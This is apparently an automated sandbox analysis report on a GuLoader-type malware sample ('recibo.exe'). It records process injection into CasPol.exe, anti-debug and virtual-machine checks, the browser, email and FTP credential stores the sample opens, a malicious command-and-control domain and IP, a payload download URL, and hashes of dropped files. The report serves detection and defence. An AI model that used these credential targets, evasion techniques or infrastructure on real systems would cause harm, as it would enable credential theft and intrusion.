            Source: vm3ddevapi64-debug.dll.1.dr Binary or memory string: ?d:\build\ob\bora-18379147\bora-vmsoft\build\release-x64\svga\wddm\src\lib\raster\bits2pixels.cd:\build\ob\bora-18379147\bora-vmsoft\build\release-x64\svga\wddm\src\lib\umlib\log.cC:\vm3dum_log\vm3dum%s_%d-%d.logwtC:\vm3dum_log\vm3dum*.log%.4d-%.2d-%.2dT%.2d:%.2d:%.2d.%.4d| Thread ID: %d |%s%sDXUM%s: Software\VMware, Inc.\VMware SVGADebugSearchPathEXCEPTION_ACCESS_VIOLATIONEXCEPTION_ARRAY_BOUNDS_EXCEEDEDEXCEPTION_BREAKPOINTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_FLT_INEXACT_RESULTEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_FLT_OVERFLOWEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_UNDERFLOWEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_INT_OVERFLOWEXCEPTION_NONCONTINUABLE_EXCEPTIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_SINGLE_STEPunknownBacktrace[%2d] rip=%p %s+%#x %s:%d
            Source: CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
            Source: vm3ddevapi64-debug.dll.1.dr Binary or memory string: Software\VMware, Inc.\VMware SVGA
            Source: recibo.exe, 00000001.00000002.23386279230.0000000004749000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
            Source: recibo.exe, 00000001.00000002.23386279230.0000000004749000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
            Source: CasPol.exe, 00000004.00000002.28053311959.0000000002C99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_71541BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_71541BFF
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_02CB12C7 rdtsc 1_2_02CB12C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_02CC5269 mov eax, dword ptr fs:[00000030h] 1_2_02CC5269
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_02CBBC2D mov eax, dword ptr fs:[00000030h] 1_2_02CBBC2D
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_02CC3D6A mov eax, dword ptr fs:[00000030h] 1_2_02CC3D6A
            Source: C:\Users\user\Desktop\recibo.exe Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\recibo.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: D00000
            Source: C:\Users\user\Desktop\recibo.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\recibo.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_02CB4544 cpuid 1_2_02CB4544
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\recibo.exe Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_0040352D

            Stealing of Sensitive Information

            Source: Yara match File source: 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: CasPol.exe PID: 432, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

            Remote Access Functionality

            Source: Yara match File source: 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: CasPol.exe PID: 432, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts211
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            3
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Ingress Tool Transfer
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API
            1
            Windows Service
            1
            Access Token Manipulation
            1
            Obfuscated Files or Information
            1
            Credentials in Registry
            127
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            Exfiltration Over Bluetooth11
            Encrypted Channel
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)1
            Windows Service
            1
            Timestomp
            Security Account Manager331
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            Automated Exfiltration1
            Non-Standard Port
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)111
            Process Injection
            1
            DLL Side-Loading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            Scheduled Transfer2
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script241
            Virtualization/Sandbox Evasion
            LSA Secrets241
            Virtualization/Sandbox Evasion
            SSHKeyloggingData Transfer Size Limits123
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items111
            Process Injection
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            [Behavior graph: ID 635097, Sample: recibo.exe, Startdate: 27/05/2022, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            recibo.exe | 55% | Virustotal | | Browse
            recibo.exe | 26% | Metadefender | | Browse
            recibo.exe | 50% | ReversingLabs | Win32.Downloader.GuLoader |

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Temp\HPSUPD-Win32Exe.exe | 0% | Metadefender | | Browse
            C:\Users\user\AppData\Local\Temp\HPSUPD-Win32Exe.exe | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\Temp\lgpllibs.dll | 0% | Metadefender | | Browse
            C:\Users\user\AppData\Local\Temp\lgpllibs.dll | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll | 3% | Metadefender | | Browse
            C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\Temp\vm3ddevapi64-debug.dll | 0% | Metadefender | | Browse
            C:\Users\user\AppData\Local\Temp\vm3ddevapi64-debug.dll | 0% | ReversingLabs | |
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            cortijocuevas.com | 0% | Virustotal | | Browse

            Source | Detection | Scanner | Label | Link
            http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe |
            https://sectigo.com/CPS0 | 0% | Virustotal | | Browse
            https://sectigo.com/CPS0 | 0% | Avira URL Cloud | safe |
            http://zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt0 | 0% | Avira URL Cloud | safe |
            http://98Z0mcMphF90Ln.net | 0% | Avira URL Cloud | safe |
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | Avira URL Cloud | safe |
            http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | Avira URL Cloud | safe |
            http://zerossl.ocsp.sectigo.com0 | 0% | Avira URL Cloud | safe |
            http://BPNlDG.com | 0% | Avira URL Cloud | safe |
            https://mozilla.org0 | 0% | Avira URL Cloud | safe |
            http://mail.cortijocuevas.com | 0% | Avira URL Cloud | safe |
            http://cortijocuevas.com | 0% | Avira URL Cloud | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            cortijocuevas.com | 168.119.38.32 | true | true | | unknown
            drive.google.com | 172.217.16.142 | true | false | | high
            googlehosted.l.googleusercontent.com | 142.250.185.65 | true | false | | high
            doc-0g-cc-docs.googleusercontent.com | unknown | unknown | false | | high
            mail.cortijocuevas.com | unknown | unknown | true | | unknown

            Name | Malicious | Antivirus Detection | Reputation
            https://doc-0g-cc-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/c6f1jlkill7f0g8rg2nidoteuikk5gii/1653650775000/00619175272154792338/*/1EX-TfU9P_N_SsQAtVtT8-t2zzMXng6WS?e=download | false | | high
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1CasPol.exe, 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      https://sectigo.com/CPS0CasPol.exe, 00000004.00000002.28076773888.000000001D59A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28083111699.000000001F5FA000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.vmware.com/0recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drfalse
                        high
                        http://www.symauth.com/rpa00recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drfalse
                          high
                          https://drive.google.com/CasPol.exe, 00000004.00000002.28051387241.0000000000FF8000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt0CasPol.exe, 00000004.00000002.28076773888.000000001D59A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28083111699.000000001F5FA000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://98Z0mcMphF90Ln.netCasPol.exe, 00000004.00000002.28076991037.000000001D5C6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://drive.google.com/pCasPol.exe, 00000004.00000002.28051387241.0000000000FF8000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://doc-0g-cc-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/c6f1jlkiCasPol.exe, 00000004.00000002.28051958179.000000000105A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23356845957.000000000108B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23357279169.000000000108B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28052337111.0000000001088000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23361732323.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23361300201.000000000108B000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.sil.org/iso639-3/iso_639-3.xml.1.drfalse
                                  high
                                  http://www.vmware.com/0/recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drfalse
                                    high
                                    https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 00000004.00000002.28076011744.000000001D510000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://zerossl.ocsp.sectigo.com0CasPol.exe, 00000004.00000002.28076773888.000000001D59A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.28083111699.000000001F5FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://doc-0g-cc-docs.googleusercontent.com/CasPol.exe, 00000004.00000002.28051758174.0000000001039000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.23361300201.000000000108B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://nsis.sf.net/NSIS_ErrorErrorrecibo.exefalse
                                          high
                                          http://www.symauth.com/cps0(recibo.exe, 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vm3ddevapi64-debug.dll.1.drfalse
                                            high
                                            http://BPNlDG.comCasPol.exe, 00000004.00000002.28075201958.000000001D471000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://mozilla.org0lgpllibs.dll.1.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://mail.cortijocuevas.comCasPol.exe, 00000004.00000002.28076773888.000000001D59A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://cortijocuevas.comCasPol.exe, 00000004.00000002.28076773888.000000001D59A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://doc-0g-cc-docs.googleusercontent.com/eCasPol.exe, 00000004.00000003.23361300201.000000000108B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              IP | Domain | Country | ASN | ASN Name | Malicious
                                              168.119.38.32 | cortijocuevas.com | Germany | 24940 | HETZNER-ASDE | true
                                              172.217.16.142 | drive.google.com | United States | 15169 | GOOGLEUS | false
                                              142.250.185.65 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false
                                              Joe Sandbox Version: 34.0.0 Boulder Opal
                                              Analysis ID: 635097
                                              Start date and time: 27/05/2022 13:24:05, 2022-05-27 13:24:05 +02:00
                                              Joe Sandbox Product: CloudBasic
                                              Overall analysis duration: 0h 13m 5s
                                              Hypervisor based Inspection enabled: false
                                              Report type: full
                                              Sample file name: recibo.exe
                                              Cookbook file name: default.jbs
                                              Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                              Run name: Suspected Instruction Hammering
                                              Number of analysed new started processes analysed: 23
                                              Number of new started drivers analysed: 0
                                              Number of existing processes analysed: 0
                                              Number of existing drivers analysed: 0
                                              Number of injected processes analysed: 0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode: default
                                              Analysis stop reason: Timeout
                                              Detection: MAL
                                              Classification: mal100.troj.spyw.evad.winEXE@6/12@3/3
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HDC Information:
                                              • Successful, ratio: 32.5% (good quality ratio 32%)
                                              • Quality average: 86.8%
                                              • Quality standard deviation: 21.4%
                                              HCA Information:
                                              • Successful, ratio: 97%
                                              • Number of executed functions: 163
                                              • Number of non-executed functions: 109
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.54.122.82, 20.82.19.171
                                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, client.wns.windows.com, wdcpalt.microsoft.com, ctldl.windowsupdate.com, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, img-prod-cms-rt-microsoft-com.akamaized.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              Time | Type | Description
                                              13:26:37 | API Interceptor | 2735x Sleep call for process: CasPol.exe modified
                                              No context
                                              No context
                                              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
HETZNER-ASDE
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
37f463bf4616ecd445d4a1937da06e19
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
C:\Users\user\AppData\Local\Temp\HPSUPD-Win32Exe.exe
                                                                                Process:C:\Users\user\Desktop\recibo.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
                                                                                Category:dropped
                                                                                Size (bytes):10521
                                                                                Entropy (8bit):7.888779038440803
                                                                                Encrypted:false
                                                                                SSDEEP:192:oXRZxdt62XpqRigPYtY0CfKTQlh5NKW6F5oJxfskCjGmXa6Pbpwr4WmKM:KRfdt62X+XoElh/KW6ifskEGeaIpwr4n
                                                                                MD5:8D61CCB44C962D7831FB6703B4AF623D
                                                                                SHA1:2BFDC667151057B3A42CDD22F9EB0E5AB0B0EF3C
                                                                                SHA-256:1EFFB5A4A46B05C024518546D4C8BBB45AD3496590E3E86AF533CF31C61512F4
                                                                                SHA-512:FE0C304F73713552ACA3A28D9CCD6BD2C53A45F72052892CC8F94D835A213F2F3C4D8D1656BD8160AE874A63FACC6B79BA763D4A724281E5F0DEDAC87F86375E
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Process:C:\Users\user\Desktop\recibo.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):95635
                                                                                Entropy (8bit):6.715584422233703
                                                                                Encrypted:false
                                                                                SSDEEP:768:9hlBFBNMGjjT0QwOqKvIRnCkPFG4ouc83ArsfQFaFL03ZLoeZ4YgXplXpyfHqvds:91XNMjjEqnIfsVFIhBQlYG22vAlGI
                                                                                MD5:0DBDB94BF9F058978C90852607F98DBD
                                                                                SHA1:DCA1907D14891499D855DEB23BF461799C7ED0C4
                                                                                SHA-256:11D6302EBD701AD527EC6358E33FC578AE0D88AC9A43AC03F4AD5276B186538E
                                                                                SHA-512:0D6C48216172958EFE0E305B81D8B0B5C3606F001969E80220D4EBCF818013416992BC8D0638F4B0F6E337040CCABD607731F1912BA9DCFAA2E69C824CFC2877
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Process:C:\Users\user\Desktop\recibo.exe
                                                                                File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):58368
                                                                                Entropy (8bit):5.856484138583398
                                                                                Encrypted:false
                                                                                SSDEEP:768:t2y20tpnvfSd9bbM9tmRtTkwv9QMdVk1QKVnjphRJy26xG0XFC19Io:J20t1SdN0kvZ9pdW1QKVjzy26opD
                                                                                MD5:D600D4F40A2BE641991044EE0814BFA4
                                                                                SHA1:3BDEF3488C28D43D285C47F46B82B980A8F41CD8
                                                                                SHA-256:B0D12A7AADF51B02D52E9E88295E6E6606F68C1508C8D9323B6549AA20EC82AA
                                                                                SHA-512:27B125260AA56FCAD4153A3259ECFB898681C9B096A4A37EB32AC3B722599EA4BFB5BF00F0247136F11F73F280B85844B37F6236331A0EF3B90ED2EC70CEDA55
                                                                                Malicious:false
                                                                                Antivirus:
• Antivirus: Metadefender, Detection: 0%
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Joe Sandbox View:
• Filename: recibo.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, Detection: malicious
• Filename: SecuriteInfo.com.Gen.Variant.Nemesis.7115.16481.exe, Detection: malicious
• Filename: cinchonate.exe, Detection: malicious
• Filename: cinchonate.exe, Detection: malicious
• Filename: DHL RECEIPT AWB2036472836.xlsx, Detection: malicious
• Filename: 72rPHMzujO.exe, Detection: malicious
• Filename: mic(1).exe, Detection: malicious
• Filename: 72rPHMzujO.exe, Detection: malicious
• Filename: mic(1).exe, Detection: malicious
• Filename: SWIFT.xlsx, Detection: malicious
• Filename: bena.exe, Detection: malicious
• Filename: payment_34662.exe, Detection: malicious
• Filename: bena.exe, Detection: malicious
• Filename: payment_34662.exe, Detection: malicious
• Filename: PO DP526-025840 & PO DP526-025841.xlsx, Detection: malicious
                                                                                Reputation:moderate, very likely benign file
                                                                                Process:C:\Users\user\Desktop\recibo.exe
                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):37188
                                                                                Entropy (8bit):3.999253187571331
                                                                                Encrypted:false
                                                                                SSDEEP:768:cqLtUhAIasZdPK3ukVO7103q1LjVG0I6Z93rWa1FLXSBhuj3KmuzoAgZ:coUvbkVORtVjVG0I6rbWa1FzSBh0Go9Z
                                                                                MD5:6001AAC06A6EB2B760F3DC4BE1B2D3F8
                                                                                SHA1:A88A72756DB347DE9507495A9F6D5E521EB5FB42
                                                                                SHA-256:0E1AB3CD23AE04019CAEBE185924D859E7017E933F824B1CBEB50FAD08B0CC76
                                                                                SHA-512:B400F2609A8E67BD53062E73FE8A0BD3960CD62A0D388F228C1DE4A01627C4A07F42961161CC2195DEA6961BBC43FF25E6E0E67963A55FEA31B42050F3C68424
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\recibo.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:dropped
                                                                                Size (bytes):193
                                                                                Entropy (8bit):6.41289035005742
                                                                                Encrypted:false
                                                                                SSDEEP:6:6v/lhPys693pMeNKrccoz4OtOOFImbTM0t7zlyH//jp:6v/7adpfNWcVkqfTMyUf1
                                                                                MD5:F492568998D5783731D50D7CA73AC7A3
                                                                                SHA1:E87B96367BDB02176067336A1CCE3B32EBDCB3B2
                                                                                SHA-256:7A08D7B1CC724A453A0C3EB2F36369D7FD6AC6BD965CE0B4D075D570ED369A9B
                                                                                SHA-512:2C6C726426EA6DD4C7CCC141152E24DD46BDB11D3DB45ED7BA6EAC06DE922F69E5172D5431D63B9ACF96E54B89857317CA0F87880F7B03C43AF9F7416EE95C73
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\recibo.exe
                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1063988
                                                                                Entropy (8bit):4.881622518734141
                                                                                Encrypted:false
                                                                                SSDEEP:6144:z6ZdTZZl/WX4fVLcf9MvAadpxr5+ZiVHPZ6TZXjcePr:z6nTZZl/WX4fVLcqvV5+ZiX6TZXJ
                                                                                MD5:DCAD3B0F729144CE9EE9A6006D9C3E74
                                                                                SHA1:3EEF5F61BEF834B7089A87423D128990A1065E81
                                                                                SHA-256:D8AB9C2641481645A8ACF875FFA3E3CB271D2CD946691DD8E0BD48513FFF1370
                                                                                SHA-512:BB0ED1F9FBB122728776731B04C54C8FBA57BF2987D04DAD1167FC879FC8A2483093E1A8304A021D6238B408FED826E902386D7DB52B7988CE9DCC89ACB64611
                                                                                Malicious:false
                                                                                Preview:<?xml version="1.0" encoding="UTF-8" ?>.... ....WARNING: THIS FILE IS DEPRECATED.....PLEASE USE THE JSON DATA INSTEAD.....Usually, this data can be found in /usr/share/iso-codes/json.....This file gives a list of all languages in the ISO 639-3..standard, and is used to provide translations via gettext....Copyright . 2005 Alastair McKinstry <mckinstry@computer.org>..Copyright . 2008,2012,2013 Tobias Quathamer <toddy@debian.org>.... This file is free software; you can redistribute it and/or.. modify it under the terms of the GNU Lesser General Public.. License as published by the Free Software Foundation; either.. version 2.1 of the License, or (at your option) any later version..... This file is distributed in the hope that it will be useful,.. but WITHOUT ANY WARRANTY; without even the implied warranty of.. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.. Lesser General Public License for more details..... You should have received a co
                                                                                Process:C:\Users\user\Desktop\recibo.exe
                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):37816
                                                                                Entropy (8bit):6.374742588554942
                                                                                Encrypted:false
